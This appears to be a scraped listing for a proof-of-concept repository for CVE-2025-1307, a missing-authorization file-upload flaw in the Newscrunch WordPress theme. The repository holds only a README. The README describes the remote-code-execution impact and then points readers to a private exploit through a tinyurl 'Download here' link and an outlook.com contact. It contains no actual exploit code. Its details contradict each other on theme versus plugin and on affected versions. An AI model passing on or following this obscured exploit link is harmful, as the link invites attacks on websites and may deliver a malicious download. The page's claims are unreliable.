CVE-2025-1307 PoC — WordPress plugin Newscrunch 安全漏洞

Source

Associated Vulnerability

Description

Missing Authorization (CWE-862)

Readme

# CVE-2025-1307 Missing Authorization (CWE-862)

## Overview
A vulnerability in the Newscrunch theme for WordPress allows authenticated attackers with Subscriber-level access or higher to upload arbitrary files on the affected site's server. The vulnerability stems from a missing capability check in the newscrunch_install_and_activate_plugin() function in all versions up to and including 1.8.4.1.


## Details
+ **CVE ID**: CVE-2025-1307

+ **Published**: 03/04/2025

+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Impact
Attackers can potentially upload malicious files to the WordPress site, which could lead to remote code execution. This means an attacker could: - Upload and execute arbitrary PHP scripts - Compromise the entire WordPress site - Potentially gain unauthorized access to the server - Modify, delete, or steal sensitive site data - Use the compromised site for further malicious activities

## Affected Versions
WorldPress plugin : Newscrunch <= 1.8.4


## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
## Exploit
+ **Exploit** :**[Download here](https://tinyurl.com/22kn38pk)**

File Snapshot

 [4.0K]  /data/pocs/39aa5ab4d7f92df9328dd754d5e89ed94118d50c
└── [1.1K]  README.md

0 directories, 1 file

Remarks